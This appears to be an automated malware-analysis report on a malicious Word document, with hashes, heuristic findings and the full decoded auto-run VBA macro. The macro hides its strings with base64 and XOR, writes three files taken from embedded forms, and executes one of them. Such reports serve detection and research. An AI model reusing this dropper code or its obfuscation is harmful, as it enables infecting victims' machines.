Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 5bc4206e5f91f792…

MALICIOUS

Office (OLE) / .DOC

Size: 44.5 KB
Created: 2026-06-12 02:35:00
Authoring application: Microsoft Office Word
First seen: 2026-06-15
MD5: d9a0f30a247fccb947326e2df7a3760d
SHA-1: 664d3b915d7e7f007fb16ea363b2a0e559235229
SHA-256: 5bc4206e5f91f7924aaa57d46b5e16b1998841ae1008d0943a5db3bc1684ce18
Risk score: 178

Heuristics (8)

  • VBA macros detected (severity: medium; 5 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call (severity: high) OLE_VBA_CREATEOBJ
    Matched line in script:
        Set wsh = CreateObject(xibasbd)
  • CallByName call (severity: high) OLE_VBA_CALLBYNAME
    Matched line in script:
        result(0) = CallByName(UserForm1.Controls(vnsadf), tyvdf, VbGet)
  • VBA p-code auto-exec with execution tokens (severity: high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro (severity: low) OLE_VBA_AUTOOPEN
    Matched line in script:
        Sub AutoOpen()
  • Environ() call (env variable access) (severity: low) OLE_VBA_ENVIRON
    Matched line in script:
        GetstoragePath = Environ(sbcba)
  • Legacy WordBasic auto-exec macro marker (severity: medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7508 bytes
SHA-256: c9cc9e570929e2053dd4aa8f0ff9b2fc80f436cf821e6b512913eb8634529442

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Const keyHex = "436162666269617369767579"

Sub xvqkblk(cvacjgzddhi As String)
    Dim wsh As Object
    xibasbd = livbwfa("FDI" + _
    "BFA" + _
    "sZF" + _
    "V" + _
    "0a" + _
    "HhA" + _
    "VL" + _
    "w=" + _
    "=")
    Set wsh = CreateObject(xibasbd)
    
    wsh.Run GetQuoteStart() & GetC(cvacjgzddhi) & GetQuoteStart(), GetWindowStyle(), False
End Sub

Function GetQuoteStart() As String
    GetQuoteStart = Chr(34)
End Function

Function GetC(cvacjgzddhi As String) As String
    GetC = cvacjgzddhi
End Function

Function GetWindowStyle() As Integer
    GetWindowStyle = CalculateStyleValue()
End Function

Function CalculateStyleValue() As Integer
    CalculateStyleValue = SubtractValues(10, 5)
End Function

Function SubtractValues(a As Integer, b As Integer) As Integer
    SubtractValues = a - b
End Function

Function fileExist(filePath)
    Dim fso
    asbabc = livbwfa("EAI" + _
    "QD" + _
    "xIdC" + _
    "B" + _
    "0" + _
    "OW" + _
    "DMQL" + _
    "w" + _
    "Q" + _
    "xH" + _
    "xEd" + _
    "BB4m" + _
    "FB" + _
    "8" + _
    "c" + _
    "IBU=")
    Set fso = CreateObject(asbabc)
    If fso.fileExists(filePath) Then
        fileExist = True
    Else
        fileExist = False
    End If
    Set fso = Nothing
End Function

Private Function CleanInputString(s As String) As String
    On Error Resume Next
    CleanInputString = Replace(Replace(Replace(Replace(s, " ", ""), vbCr, ""), vbLf, ""), vbCrLf, "")
End Function

Private Function hbvaf(cleanedStr As String) As Byte()
    On Error Resume Next
    Dim objNode As Object
    Dim emptyBytes() As Byte
    
    Set objNode = CreateObject("M" + _
    "SX" + _
    "M" + _
    "L2" + _
    ".DO" + _
    "MD" + _
    "o" + _
    "c" + _
    "u" + _
    "m" + _
    "e" + _
    "nt").createElement("b6" + _
    "4")
        
    With objNode
        .DataType = "bi" + _
    "n.b" + _
    "as" + _
    "e6" + _
    "4"
        .Text = cleanedStr
        hbvaf = .nodeTypedValue
    End With
   
End Function

Function chstd(s As String) As Byte()
    Dim cleanedStr As String
    cleanedStr = CleanInputString(s)
    chstd = hbvaf(cleanedStr)
End Function

Private Function livbwfa(ByVal encodedStr As String) As String
    Dim decodedBytes() As Byte
    Dim keyBytes() As Byte
    Dim resultBytes() As Byte
    Dim i As Long
    Dim keyLen As Long
    Dim dataLen As Long
    Dim hexByte As String

    decodedBytes = chstd(encodedStr)
    If UBound(decodedBytes) = -1 Then
        livbwfa = ""
        Exit Function
    End If
    dataLen = UBound(decodedBytes) + 1

    keyLen = Len(keyHex) / 2
    If keyLen <= 0 Then
        livbwfa = ""
        Exit Function
    End If
    ReDim keyBytes(0 To keyLen - 1)
    For i = 0 To keyLen - 1
        hexByte = Mid(keyHex, i * 2 + 1, 2)
        If Len(hexByte) <> 2 Then
            livbwfa = ""
            Exit Function
        End If
        keyBytes(i) = CByte("&H" & hexByte)
    Next i

    ReDim resultBytes(0 To dataLen - 1)
    For i = 0 To dataLen - 1
        resultBytes(i) = decodedBytes(i) Xor keyBytes(i Mod keyLen)
    Next i

    livbwfa = StrConv(resultBytes, vbUnicode)
End Function


Private Function kabsd(buf As Variant) As Byte()
    Dim i As Long
    Dim tmp() As Byte
    
    If VarType(buf) <> vbArray + vbByte Then
        kabsd = Split("")
        Exit Function
    End If
    
    ReDim tmp(LBound(buf) To UBound(buf))
    For i = LBound(buf) To UBound(buf)
        tmp(i) = buf(i)
    Next i
    
    kabsd = tmp
End Function

Private Function WBTD(FileName As String, staticBuf() As Byte) As Boolean
    Dim fileNum As Integer
    Dim i As Long
    
    On Error GoTo ErrHandler
    
    fileNum = FreeFile
    Open FileName For Binary As #fileNum
    
    For i = LBound(staticBuf) To UBound(staticBuf)
        Put #fileNum, , staticBuf(i)
    Next i
    
    Close #fileNum
    WBTD = True
    Exit Function

ErrHandler:
    WBTD = False
End Function

Function WrtBnfile(FileName As String, buf As Variant) As Boolean
    Dim staticBuf() As Byte
    
    staticBuf = kabsd(buf)
    
    On Error Resume Next
    If UBound(staticBuf) < LBound(staticBuf) Then
        WrtBnfile = False
        Exit Function
    End If
    On Error GoTo 0
    
    WrtBnfile = WBTD(FileName, staticBuf)
End Function

Function vzexuqlaqfmxnd(path As String, conte As String)

    hwminiArra = chstd(conte)
    WrtBnfile path, hwminiArra

End Function


Function GetstoragePath() As String
    sbcba = livbwfa("FwQ" + _
    "PF" + _
    "g==")
    GetstoragePath = Environ(sbcba)
End Function

Function BuildDP1(appDataPath As String) As String
    asnca = livbwfa("Jg" + _
    "M" + _
    "NCQ" + _
    "lEBB" + _
    "cAAl" + _
    "s" + _
    "cOw" + _
    "Q" + _
    "=")
    BuildDP1 = appDataPath & "\" & asnca
End Function

Function BuildDP2(appDataPath As String) As String
    sdvv = livbwfa("ACA" + _
    "O" + _
    "D" + _
    "wA" + _
    "b" + _
    "BF" + _
    "4lNw" + _
    "AXI" + _
    "AkHF" + _
    "Ew" + _
    "N" + _
    "DR8" + _
    "=")
    BuildDP2 = appDataPath & "\" & sdvv
End Function

Function BuildDP3(appDataPath As String) As String
    ubv = livbwfa("J" + _
    "gU" + _
    "LE" + _
    "lBH" + _
    "CR" + _
    "8Z")
    BuildDP3 = appDataPath & "\" & ubv
End Function

Function GetFormContent() As String()
    Dim result(2) As String
    vnsadf = livbwfa("AA4" + _
    "PCw" + _
    "MH" + _
    "BTEc" + _
    "AgE" + _
    "W" + _
    "L" + _
    "VA" + _
    "=")
    tyvdf = livbwfa("A" + _
    "A" + _
    "ASE" + _
    "g" + _
    "sGD" + _
    "w" + _
    "==")
    result(0) = CallByName(UserForm1.Controls(vnsadf), tyvdf, VbGet)
    result(1) = CallByName(UserForm2.Controls(vnsadf), tyvdf, VbGet)
    result(2) = CallByName(UserForm3.Controls(vnsadf), tyvdf, VbGet)
    GetFormContent = result
End Function


Sub ypoc(destPath1 As String, destPath2 As String, destPath3 As String, content() As String)
    vzexuqlaqfmxnd destPath1, content(0)
    vzexuqlaqfmxnd destPath2, content(1)
    vzexuqlaqfmxnd destPath3, content(2)
End Sub

Sub checkrun(njivnbd As String)
    xvqkblk (njivnbd)
End Sub

Sub gdsfa(ByRef f1 As String, ByRef f2 As String, ByRef f3 As String)
    Dim baseDir As String
    baseDir = GetstoragePath()
    
    f1 = BuildDP1(baseDir)
    f2 = BuildDP2(baseDir)
    f3 = BuildDP3(baseDir)
    Call MaterializeAssets(f1, f2, f3)
End Sub

Sub MaterializeAssets(inPath1 As String, inPath2 As String, inPath3 As String)
    If Not fileExist(inPath1) Then
        Dim byteData() As String
        byteData = GetFormContent()
        ypoc inPath1, inPath2, inPath3, byteData
        Call asdfuib(inPath1)
    End If
End Sub

Sub asdfuib(targetPath As String)
    checkrun targetPath
End Sub

Function start()
    Dim f1 As String, f2 As String, f3 As String
    
    Call gdsfa(f1, f2, f3)
          
End Function

Sub AutoOpen()
start
End Sub